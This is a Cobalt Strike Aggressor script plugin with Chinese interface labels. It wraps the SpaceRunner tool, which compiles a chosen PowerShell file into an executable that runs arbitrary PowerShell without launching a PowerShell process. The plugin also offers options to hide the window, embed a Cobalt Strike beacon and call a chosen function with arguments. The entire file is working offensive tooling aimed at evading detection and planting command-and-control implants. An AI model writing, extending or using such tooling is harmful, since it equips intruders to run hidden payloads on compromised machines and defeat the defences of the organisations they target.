sub SpaceRunner{
    local('$_type $_generater $_isbeacon $_hide $_func $_args $_file');
    #$_type = $3['type'];
    $_isbeacon = " -b ";
    $_hide = " -h ";
    $_func = " -f ".$3['func'];
    $_args = " -a ".$3['args'];
    $_generater = script_resource("post\\SpaceRunner\\spacerunner.exe");
    #TODO support remote file
    #if($_type eq "Local"){
        $_file = $3['lfile'];
        $cmd = $_generater." -i ".$_file." -o ".script_resource("bin\\server-".getFileName($_file).".exe");
        if($3['hide'] eq "true"){
            $cmd = $cmd.$_hide;
        }
        if($3['beacon'] eq "true"){
            $cmd = $cmd.$_isbeacon;
        }
        if($3['func'] ne ""){
            $cmd = $cmd.$_func;
        }
        if($3['args'] ne ""){
            $cmd = $cmd.$_args;
        }
        exec($cmd);
        show_message("Save success: ".script_resource("bin\\server-".getFileName($_file).".exe"));
    #}
}
item "SpaceRunner"{
    $Dialog = dialog("SpaceRunner",%(),&SpaceRunner);
    dialog_description($Dialog, "该工具可编译C#程序执行任意PowerShell代码，无需启动PowerShell进程");
    #drow_combobox($Dialog, "type",  "Generate type: ", @("Local","Remote"));
    drow_file($Dialog, "lfile", "本地PS文件: ");
    #drow_text($Dialog, "rfile", "Remote PS file: ");
    drow_text($Dialog, "func", "调用函数: ");
    drow_text($Dialog, "args", "函数参数: ");
    drow_checkbox($Dialog, "beacon", "Cobalt Strike beacon: ", "");
    drow_checkbox($Dialog, "hide", "隐藏窗口: ", "");
    dbutton_action($Dialog, "生成");
    dialog_show($Dialog);
}